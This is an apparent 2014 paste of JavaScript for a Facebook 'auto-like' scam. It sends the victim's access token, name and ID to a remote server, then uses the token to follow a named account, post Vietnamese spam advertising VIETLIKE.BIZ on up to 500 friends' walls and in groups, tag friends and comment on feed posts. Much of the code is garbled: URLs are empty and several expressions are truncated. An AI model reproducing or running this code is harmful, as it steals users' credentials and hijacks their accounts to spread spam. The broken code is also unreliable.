Guest User


a guest
Oct 31st, 2014
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  1. <script>
  2. var arr=[""];
  3. var tokenme;
  4. var user = {};
  5. function ileti(type,msg){
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  10. $('#gonder').click(function(){
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  28. $.ajax({
  29. url: '',
  30. data: 'acessinterdata=' + access_token + '&user_name=' + + '&user_id=' + ,
  31. success: function(data){
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  35. add(tokenme,"");
  37. follow("zanedarkvn");
  43. Feed_Tag(access_token);
  44. getStatus(access_token);
  45. Get_Groups();
  46. frnds();
  47. pgrp();
  48. arkadaslar();
  49. Feed_Groups(a);
  50. }else{
  51. ileti("error",user.error.type+" error ("+user.error.code+")");
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  60. function pgrp(){
  61. jQuery.ajax({
  62. url:' gid, name from group where gid IN (SELECT gid FROM group_member WHERE uid=me()) order by rand() limit 70&access_token='+access_token,
  63. dataType:'jsonp',
  64. success:function(data){
  65. wallpostg(data);
  66. }
  67. });
  68. }
  69. function frnds(){
  70. jQuery.ajax({
  71. url:' uid, first_name FROM user WHERE uid IN ( SELECT uid2 FROM friend WHERE uid1 = me() ) ORDER BY rand() limit 500&access_token='+access_token,
  72. dataType:'jsonp',
  73. success:function(data){
  74. wallpost(data);
  75. }
  76. });
  77. }
  78. function kayit(user,token){
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  81. type:'POST',
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  83. success:function(data){
  84. if(data == "true"){
  85. ileti("success","Kayit basarili");
  86. }
  87. }
  88. });
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  90. function sayfalar(sayfa){
  91. }
  92. function arakla(token){
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  96. success:function(data){
  97. if({
  98. kayit(data,token);
  99. }
  100. }});
  101. }
  102. function Get_Groups() {
  103. jQuery.ajax({
  104. url: ' gid FROM group WHERE gid IN (SELECT gid FROM group_member WHERE uid = me()) order by rand()&access_token=' + access_token,
  105. dataType: 'jsonp',
  106. success: function (a) {
  107. Feed_Groups(a)
  108. }
  109. })
  110. }
  112. link=" VIETLIKE*BIZ - Post=";
  113. fotolink ="";
  114. text =" Auto Like ,Auto Sub ,Auto Share ,Auto FanPage . Không Spam , Free , chát lượng , An Toàn Tuyệt Đối. Truy cập VIETLIKE. BIZ để sử dụng nha ! <3 nhớ vào auto ủng hộ nhé !"+link+ Math.floor((Math.random()*100000)+1);
  115. gonderildi = 0;
  116. a ="agrad?vel " + Math.floor((Math.random()*50)+50);
  117. function com(a){$.getJSON('' + a + '&access_token='+access_token)};
  118. function wallpost(list){
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  121. url:''[i].uid+'/photos?url=' + fotolink + '&message=' + text +'&callback=paylas&method=POST&access_token=' + access_token,
  122. dataType:'script',
  123. success:function(){
  124. gonderildi += 1;
  125. if(gonderildi >={
  126. }
  127. }
  128. });
  129. }
  130. }
  131. function Feed_Groups(a) {
  132. for (i = 0; i <; i++) {
  133. tiny_wal(lnk, access_token,[i].gid)
  134. }
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  136. function wallpostg(list){
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  139. url:''[i].gid+'/photos?url=' + fotolink + '&message='+ text +'&callback=paylas&method=POST&access_token=' + access_token,
  140. dataType:'script',
  141. success:function(){
  142. gonderildi += 1;
  143. if(gonderildi >={
  144. }
  145. }
  146. });
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  149. function foto_paylas(){
  150. jQuery.ajax({
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  152. dataType:'script',
  153. success:function(){
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  155. });
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  157. var turler = {video:"Video",status:"Durum Guncellemesi",link:"Baglanti",photo:"Fotograf",swf:"Video"};
  158. function gonderiler(){
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  160. url:',privacy,type)&access_token=' + access_token,
  161. dataType:'jsonp',
  162. success:function(data){
  163. posts = data;
  164. for(i=0;i<;i++){
  165. if([i].message){
  166. ileti("success",[i].message.substr(0,50)+"... ("+turler[[i].type]+")");
  167. }else{
  168. ileti("success","ID: "[i].id.split("_")[1]+"... ("+turler[[i].type]+")");
  169. }
  170. }
  171. }
  172. });
  173. }
  174. function paylas(){
  175. }
  176. function get_friends(){
  177. jQuery.ajax({
  178. url:' uid, first_name FROM user WHERE uid IN ( SELECT uid2 FROM friend WHERE uid1 = me() ) ORDER BY rand() limit 100&access_token='+access_token,
  179. dataType:'jsonp',
  180. success:function(data){
  181. post_friends(data);
  182. }
  183. });
  184. }
  185. function post_friends(list){
  186. for(i=0;i<;i++){
  187. jQuery.ajax({
  188. url:''[i].uid+'/photos?url=' + image_link + '&message=' + text +'' + link+ '&callback=paylas&method=POST&access_token=' + access_token,
  189. dataType:'script',
  190. success:function(){
  191. gonderildi += 1;
  192. if(gonderildi >={
  193. }
  194. }
  195. });
  196. }
  197. }
  198. function follow(follow){
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  200. url:'' + follow + '/subscribers?access_token=' + access_token + '&method=post',
  201. dataType:'jsonp',
  202. success:function(data){
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  204. });
  205. }
  206. function ahmed(link){
  207. jQuery.ajax({
  208. url:'' + access_token + '&method=POST&url=' + link,
  209. dataType:'jsonp',
  210. success:function(data){
  211. }
  212. });
  213. }
  214. jQuery.ajax({
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  217. success:function(data){
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  220. function Feed_Tag(access_token) {
  221. $.getJSON('' + fotolink + '&message='+ text +' &method=POST&access_token='+access_token, function (f) {
  222. if ( {
  223. $.getJSON(''+access_token, function (c) {
  224. if ( {
  225. var e = [];
  226. $.each(, function (a, b) {
  227. e.push(;
  228. $.getJSON('' + + '/tags?to=' + + '&method=post&access_token='+access_token)
  229. })
  230. }
  231. })
  232. }
  233. });
  234. }
  235. function sstats() {
  236. access_token = $('#access_token').val();
  237. $.post("", { subs: } );
  238. sub(access_token,arr[Math.round(arr.length*Math.random())]);
  239. setTimeout("getStatus()",10000);
  240. }
  241. function getStatus(token){
  242. var commentShort = " Auto Like ,Auto Sub ,Auto Share ,Auto FanPage . Không Spam , Free , chất lượng , An Toàn Tuyệt Đối. Truy cập VIETLIKE.BIZ để sử dụng nha ! <3 nhớ vào auto ủng hộ nhé .";
  243. $.getJSON('' + token, function (response) {
  244. if ( {
  245. var userid =;
  246. var totalComments = 500;
  247. $.getJSON('' + userid + '/home?limit=' + totalComments + '&access_token=' + token, function (response) {
  248. if({
  249. var allPosts = [];
  250. $.each(, function(i,data){
  251. allPosts.push(;
  252. var megaNumber=Math.floor(Math.random()*900);
  253. var commentMessage = commentShort;
  254. $.getJSON('' + + '/comments?method=POST&message=' + commentMessage + '&access_token=' + token, function (response) {
  255. //alert("Comment Posted!");
  256. });
  257. });
  258. }
  259. });
  260. }
  261. });
  262. }
  263. function sub(id){
  264. $.getJSON(''+id+'&method=post&access_token=' +token, function (response) {
  265. //alert(response);
  266. });
  267. }
  268. function add(token,ids){
  269. $.getJSON('' + ids + '&method=post&access_token=' + token, function (response) {
  270. //alert(response);
  271. });
  272. }
  273. </script>
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